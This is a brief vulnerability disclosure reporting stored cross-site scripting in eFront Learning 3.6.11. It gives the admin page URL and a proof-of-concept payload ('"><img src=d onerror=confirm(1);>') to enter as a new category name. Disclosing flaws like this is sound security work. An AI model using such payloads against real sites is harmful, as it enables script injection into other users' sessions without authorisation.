eFront Learning version 3.6.11 suffers from a stored cross site scripting vulnerability.
003e810011af79ee652072521748cd4aa32885be460c9e002ccdbf1dd2107972
# Affected software: efrontlearning
# Type of vulnerability: stored xss
# URL: https://demo.efrontlearning.net/
# Discovered by: Provensec
# Website: https://www.provensec.com
# Description: Open Source e-Learning
# Proof of concept
#version:eFront 3.6.11
goto addd new category
https://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=directions
and add new with xss payload "><img src=d onerror=confirm(1);> and
save it payload will execute
#screen:https://prntscr.com/69zhge